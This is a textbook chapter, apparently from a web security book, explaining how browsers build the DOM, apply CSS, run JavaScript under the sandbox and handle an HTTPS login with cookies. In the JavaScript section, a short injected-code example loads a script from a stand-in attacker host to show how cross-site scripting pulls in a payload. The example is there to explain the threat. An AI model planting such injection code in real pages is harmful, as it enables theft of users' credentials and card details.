3
HOW BROWSERS WORK


Most internet users interact with websites through a browser. To build secure websites, you need to understand how browsers transform the HyperText Markup Language (HTML) used to describe web pages into the interactive, visual representations you see onscreen. This chapter covers how a modern browser renders a web page, highlighting the security measures it puts in place to protect the user—the browser security model. We’ll also look at the various ways hackers try to overcome these security measures.

Web Page Rendering

The software component within a web browser that’s responsible for transforming a web page’s HTML into the visual representation you see onscreen is called the rendering pipeline. The rendering pipeline is responsible for parsing the page’s HTML, understanding the structure and content of the document, and converting it to a series of drawing operations that the operating system can understand.

For websites in the early days of the internet, this process was relatively simple. Web page HTML contained very little styling information (such as color, font, and font size), so rendering was mostly a matter of loading text and images and drawing them onscreen in the order they appeared in the HTML document. HTML was envisioned as a markup language, meaning it described the web page by breaking it into semantic elements and annotating how the information was structured. The early web looked pretty crude, but was very efficient for relaying textual content.

Nowadays, web design is more elaborate and visually appealing. Web developers encode styling information into separate Cascading Style Sheets (CSS) files, which instruct the browser precisely how each page element is to be displayed. A modern, hyperoptimized browser like Google Chrome contains several million lines of code to correctly interpret and render HTML and deal with conflicting styling rules in a fast, uniform manner. Understanding the various stages that make up the rendering pipeline will help you appreciate this complexity.

The Rendering Pipeline: An Overview

We’ll get into the details of each stage of the rendering pipeline in a moment, but first let’s look at the high-level process.

When the browser receives an HTTP response, it parses the HTML in the body of the response into a Document Object Model (DOM): an in-memory data structure that represents the browser’s understanding of the way the page is structured. Generating the DOM is an interim step between parsing the HTML and drawing it onscreen. In modern HTML, the layout of the page can’t be determined until the whole of the HTML is parsed, because the order of the tags in the HTML doesn’t necessarily determine the location of their content.

Once the browser generates the DOM, but before anything can be drawn onscreen, styling rules must be applied to each DOM element. These styling rules declare how each page element is to be drawn—the foreground and background color, the font style and size, the position and alignment, and so on. Last, after the browser finalizes the structure of the page and breaks down how to apply styling information, it draws the web page onscreen. All of this happens in a fraction of a second, and repeats on a loop as the user interacts with the page.

The browser also loads and executes any JavaScript it comes across as it constructs the DOM. JavaScript code can dynamically make changes to the DOM and styling rules, either before the page is rendered or in response to user actions.

Now let’s look at each step in more detail.

The Document Object Model

When a browser first receives an HTTP response containing HTML, it parses the HTML document into a DOM, a data structure describing the HTML document as a series of nested elements called DOM nodes. Some nodes in the DOM correspond to elements to be rendered onscreen, such as input boxes and paragraphs of text; other nodes, such as script and styling elements, control the page’s behavior and layout.

Each DOM node is roughly equivalent to a tag in the original HTML document. DOM nodes can contain text content, or contain other DOM nodes, similar to the way HTML tags can be nested within each other. Because each node can contain other nodes in a branching fashion, web developers talk about the DOM tree.
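
For example, a minimal HTML document like the hypothetical snippet below parses into a small DOM tree: the <html> node contains a <head> node and a <body> node, the <body> node contains the <h1> and <p> nodes, and each of those contains a text node.

    <html>
      <head>
        <title>Example page</title>
      </head>
      <body>
        <h1>Welcome</h1>
        <p>This paragraph and its text become nested DOM nodes.</p>
      </body>
    </html>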

Some HTML tags, such as the <script>, <img>, <audio>, and <video> tags, as well as the <link> tags used to import stylesheets, can reference an external URL in an attribute. When they're parsed into the DOM, these tags cause the browser to import the external resources, meaning that the browser must initiate further HTTP requests. Modern browsers perform these requests in parallel with page rendering in order to speed up the page-load time.
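
As a rough illustration, each tag in the following snippet (the URLs are placeholders) causes the browser to issue one additional HTTP request while the page is being rendered:

    <!-- Each src or href attribute below triggers a further HTTP request. -->
    <link rel="stylesheet" href="https://example.com/styles.css">
    <script src="https://example.com/app.js"></script>
    <img src="https://example.com/logo.png" alt="Logo">
    <video src="https://example.com/intro.mp4" controls></video>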

The construction of the DOM from HTML is designed to be as robust as possible. Browsers are forgiving about malformed HTML; they close unclosed tags, insert missing tags, and ignore corrupted tags as needed. Browser vendors don’t punish the web user for the website’s errors.
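
For instance, a browser handed markup as sloppy as the following hypothetical fragment will still render two paragraphs; the comments describe the repairs a typical parser makes.

    <!-- No <html>, <head>, or <body> tags; the parser inserts them. -->
    <title>Broken page</title>
    <p>First paragraph    <!-- Unclosed tag; the parser closes it when the next <p> starts. -->
    <p>Second paragraph</b>    <!-- Stray closing tag; the parser ignores it. -->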

Styling Information

Once the browser has constructed the DOM tree, it needs to determine which DOM nodes correspond to onscreen elements, how to lay out those elements relative to each other, and what styling information to apply to them. Though these styling rules can be defined inline in the HTML document, web developers prefer to encode styling information in separate CSS files. Separating the styling information from the HTML content makes restyling existing content easier and keeps HTML content as clean and semantic as possible. It also makes HTML easier to parse for alternative browsing technologies such as screen readers.

When using CSS, a web developer will create one or more stylesheets to declare how elements on the page should be rendered. The HTML document imports these stylesheets by using a <link> tag that references the external URL hosting each stylesheet. Each stylesheet contains selectors that pick out tags in the HTML document and assign styling information, such as font size, colors, and position, to each. Selectors may be simple: they might state, for example, that heading text in an <h1> tag should be rendered in blue. For more complex web pages, the rules get more convoluted: a rule may describe how quickly a hyperlink changes color when the user moves their mouse over it.
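
A minimal sketch of how this fits together, using a hypothetical file name and made-up styling values: the HTML document pulls in the stylesheet with a <link> tag, and the stylesheet's selectors assign styling to the matching elements.

    <!-- In the HTML document -->
    <link rel="stylesheet" href="/styles.css">

    /* In styles.css */
    h1       { color: blue; }             /* Simple selector: every <h1> heading is blue. */
    nav h1   { color: gray; }             /* More specific selector: <h1> tags inside <nav> override the rule above. */
    a        { transition: color 0.3s; }  /* Hyperlinks change color over 0.3 seconds... */
    a:hover  { color: red; }              /* ...when the user moves the mouse over them. */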

The rendering pipeline implements a lot of logic to determine each element's final styling, because strict rules of precedence govern how competing styles are applied. Each selector can apply to multiple page elements, and each page element will often have styling information supplied by several selectors. One of the growing pains of the early internet was figuring out how to create a website that looked the same when rendered by different types of browsers. Modern browsers are generally consistent in the way they render a web page, but they still vary. The industry's benchmark for compliance with web standards is the Acid3 test, shown in Figure 3-1. Only a few browsers score 100. You can visit http://acid3.acidtests.org/ to try out the Acid3 test.

Figure 3-1: Acid3, making sure browsers can render colored rectangles correctly since 2008

The construction of the DOM tree and the application of styling rules occur in parallel to the processing of any JavaScript code contained in the web page. This JavaScript code can change the structure and layout of the page even before it’s rendered, so let’s take a quick look at how the execution of JavaScript dovetails with the rendering pipeline.

JavaScript

Modern web pages use JavaScript to respond to user actions. JavaScript is a fully fledged programming language that is executed by the browser’s JavaScript engine when web pages are rendered. JavaScript can be incorporated into an HTML document by using a <script> tag; the code may be included inline within the HTML document, or, more typically, the <script> tag will reference a JavaScript file that is to be loaded from an external URL.
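
Both forms of inclusion look something like this (the file path is a placeholder):

    <!-- Inline JavaScript, written directly in the HTML document. -->
    <script>
      console.log('Hello from an inline script');
    </script>

    <!-- External JavaScript, loaded from a URL and then executed. -->
    <script src="/js/app.js"></script>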

By default, any JavaScript code is executed by the browser as soon as the relevant <script> tag is parsed into a DOM node. For JavaScript code loaded from an external URL, this means the code is executed as soon as it is loaded.

This default behavior causes problems if the rendering pipeline hasn't finished parsing the HTML document; the JavaScript code will attempt to interact with page elements that may not yet exist in the DOM. To avoid this problem, <script> tags are often marked with a defer attribute, which causes the JavaScript to execute only once the entire DOM has been constructed.
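
A sketch of the problem and the fix, using a hypothetical element ID and script path:

    <script>
      // Runs as soon as this tag is parsed; the <p> below doesn't exist
      // in the DOM yet, so this logs null.
      console.log(document.getElementById('greeting'));
    </script>

    <!-- The defer attribute delays execution until the whole DOM is built. -->
    <script defer src="/js/page-setup.js"></script>

    <p id="greeting">Hello!</p>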

As you would imagine, the fact that browsers eagerly execute any JavaScript code they come across has security implications. A hacker’s end goal is often the remote execution of code on another user’s machine, and the internet makes this goal much easier, as it’s rare to find a computer that isn’t connected to the network in some way. For this reason, modern browsers heavily restrict JavaScript with the browser security model. This dictates that JavaScript code must be executed within a sandbox, where it’s not permitted to perform any of the following actions:

  • Start new processes or access other existing processes.

  • Read arbitrary chunks of system memory. As a memory-managed language, JavaScript can't read memory outside its sandbox.

  • Access the local disk. Modern browsers allow websites to store small amounts of data locally, but this storage is abstracted from the filesystem itself.

  • Access the operating system’s network layer.

  • Call operating system functions.

JavaScript executing in the browser sandbox is permitted to perform the following actions (a few of which are sketched in code after the list):

  • Read and manipulate the DOM of the current web page.

  • Listen to and respond to user actions on the current page by registering event listeners.

  • Make HTTP calls on behalf of the user.

  • Open new web pages or refresh the URL of the current page, but only in response to a user action.

  • Write new entries to the browser history and go backward and forward in history.

  • Ask for the user’s location. For example, “Google Maps would like to use your location.”

  • Ask permission to send desktop notifications.
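
Here are a few of those permitted actions in a handful of lines of JavaScript; the element IDs and URL are hypothetical.

    // Read and manipulate the DOM of the current web page.
    document.getElementById('status').textContent = 'Loading...';

    // Respond to user actions by registering an event listener.
    document.getElementById('refresh').addEventListener('click', () => {
      // Make an HTTP call on behalf of the user.
      fetch('/api/messages')
        .then(response => response.json())
        .then(messages => console.log(messages));
    });

    // Ask permission to send desktop notifications.
    Notification.requestPermission();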

Even with these restrictions, an attacker who can inject malicious JavaScript into your web page can still do a lot of harm by using cross-site scripting to read credit card details or credentials as a user enters them. Even tiny amounts of injected JavaScript pose a threat, because injected code can add <script> tags in the DOM to load a malicious payload. We’ll look at how to protect against this type of cross-site scripting attack in Chapter 7.
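
For example, an injected snippet as small as the following is enough to pull in an arbitrarily large malicious payload (the attacker's URL here is a placeholder):

    // The injected code creates a new <script> node...
    var payload = document.createElement('script');
    // ...points it at a URL the attacker controls...
    payload.src = 'https://attacker.example/payload.js';
    // ...and adds it to the DOM, causing the browser to load and run the payload.
    document.body.appendChild(payload);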

Before and After Rendering: Everything Else the Browser Does

A browser is much more than a rendering pipeline and a JavaScript engine. In addition to rendering HTML and executing JavaScript, modern browsers contain logic for many other responsibilities. Browsers connect with the operating system to resolve and cache DNS addresses, interpret and verify security certificates, encode requests in HTTPS if needed, and store and transmit cookies according to the web server’s instructions. To understand how these responsibilities fit together, let’s take a behind-the-scenes look at a user logging into Amazon:

  1. The user visits www.amazon.com in their favorite browser.

  2. The browser attempts to resolve the domain (amazon.com) to an IP address. First, the browser consults the operating system's DNS cache. If it finds no results, it asks the internet service provider's DNS server to check the provider's cache. In the unlikely event that none of the ISP's customers has visited the Amazon website recently, the ISP's DNS server resolves the domain by querying an authoritative DNS server.

  3. Now that it has resolved the IP address, the browser attempts to initiate a TCP handshake with the server at that IP address in order to establish a connection.

  4. Once the TCP session has been established, the browser constructs an HTTP GET request to www.amazon.com. TCP splits the HTTP request into packets and sends them to the server to be reassembled.

  5. At this point, the HTTP conversation upgrades to HTTPS to ensure secure communication. The browser and server undertake a TLS handshake, agree on an encryption cipher, and exchange encryption keys.

  6. The server uses the secure channel to send back an HTTP response containing the HTML of the Amazon front page. The browser parses and displays the page, typically triggering many further HTTP GET requests for the images, stylesheets, and scripts the page references.

  7. The user navigates to the login page, enters their login credentials, and submits the login form, which generates a POST request to the server.

  8. The server validates the login credentials and establishes a session by returning a Set-Cookie header in the response. The browser stores the cookie for the prescribed time and sends it back with subsequent requests to Amazon (this cookie exchange is sketched after the list).

After all of this happens, the user can access their Amazon account.
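
The cookie exchange in steps 7 and 8 looks roughly like the following sketch; the header values are invented for illustration, and most other headers are omitted.

    HTTP/1.1 200 OK
    Set-Cookie: session-id=a3fWa91x; Secure; HttpOnly; Max-Age=3600

    GET /account HTTP/1.1
    Host: www.amazon.com
    Cookie: session-id=a3fWa91x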

Summary

This chapter reviewed how browsers transform the HTML used to describe web pages into the interactive, visual representations you see onscreen. The browser’s rendering pipeline parses HTML documents into a Document Object Model (DOM), applies styling information from Cascading Style Sheets (CSS) files, and then lays out the DOM nodes onscreen.

You also learned about the browser security model. The browser executes JavaScript included in <script> tags under strict security rules. You also reviewed a simple HTTP conversation illustrating the browser’s many other responsibilities beyond rendering pages: reconstructing HTTP from TCP packets, verifying security certificates and securing communication using HTTPS, and storing and transmitting cookies.

In the next chapter, you’ll look at the other end of the HTTP conversation: the web server.
